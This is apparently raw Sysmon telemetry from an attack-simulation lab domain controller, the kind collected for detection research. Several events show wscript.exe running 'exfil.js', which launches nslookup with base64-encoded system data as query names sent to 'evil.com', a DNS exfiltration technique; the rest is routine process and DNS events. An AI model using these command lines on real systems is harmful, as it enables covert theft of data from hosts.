ll.dll+51791 10341000x8000000000000000209513Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.376{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18ED-629A-E043-000000005F02}7788C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209512Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.375{2E1864BB-18ED-629A-DE43-000000005F02}60721432C:\Windows\system32\cmd.exe{2E1864BB-18ED-629A-E043-000000005F02}7788C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209511Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.375{2E1864BB-18ED-629A-E043-000000005F02}7788C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18ED-629A-DE43-000000005F02}6072C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nladqi.tmp 2>&1 10341000x8000000000000000209510Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.344{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18ED-629A-DF43-000000005F02}6020C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209509Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.344{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18ED-629A-DF43-000000005F02}6020C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209508Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.344{2E1864BB-18ED-629A-DF43-000000005F02}60203832C:\Windows\system32\conhost.exe{2E1864BB-18ED-629A-DE43-000000005F02}6072C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209507Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.344{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18ED-629A-DF43-000000005F02}6020C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209506Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.329{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209505Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.329{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209504Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.329{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209503Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.329{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209502Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.329{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18ED-629A-DE43-000000005F02}6072C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209501Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.329{2E1864BB-18E0-629A-6742-000000005F02}39765700C:\Windows\System32\WScript.exe{2E1864BB-18ED-629A-DE43-000000005F02}6072C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209500Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.339{2E1864BB-18ED-629A-DE43-000000005F02}6072C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nladqi.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000209499Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.329{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlvrty.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000209498Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.297{2E1864BB-18ED-629A-DC43-000000005F02}59246492C:\Windows\system32\conhost.exe{2E1864BB-18ED-629A-DD43-000000005F02}7744C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209497Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.297{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209496Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.297{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209495Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.297{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209494Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.297{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18ED-629A-DD43-000000005F02}7744C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209493Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.297{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209492Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.297{2E1864BB-18ED-629A-DB43-000000005F02}72123448C:\Windows\system32\cmd.exe{2E1864BB-18ED-629A-DD43-000000005F02}7744C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209491Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.298{2E1864BB-18ED-629A-DD43-000000005F02}7744C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18ED-629A-DB43-000000005F02}7212C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvrty.tmp 2>&1 354300x8000000000000000209490Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.864{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50729- 354300x8000000000000000209489Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.864{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50728- 354300x8000000000000000209488Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.863{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50727- 354300x8000000000000000209487Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.788{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56424-false10.0.1.12-8000- 354300x8000000000000000209486Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.761{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50726- 354300x8000000000000000209485Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.761{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50725- 354300x8000000000000000209484Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.761{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50724- 354300x8000000000000000209483Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.677{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50723- 354300x8000000000000000209482Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.677{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50722- 354300x8000000000000000209481Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.677{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50721- 354300x8000000000000000209480Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.615{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50720- 354300x8000000000000000209479Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.615{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50719- 354300x8000000000000000209478Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.614{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50718- 354300x8000000000000000209477Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.553{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50717- 354300x8000000000000000209476Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.490{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50716- 354300x8000000000000000209475Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.490{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50715- 354300x8000000000000000209474Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.490{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50714- 354300x8000000000000000209473Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.433{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50713- 354300x8000000000000000209472Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.433{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50712- 354300x8000000000000000209471Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.432{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50711- 354300x8000000000000000209470Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.353{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50710- 354300x8000000000000000209469Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.352{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50709- 354300x8000000000000000209468Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.352{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50708- 354300x8000000000000000209467Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.269{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50707- 354300x8000000000000000209466Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.268{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50706- 354300x8000000000000000209465Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.267{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50705- 354300x8000000000000000209464Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 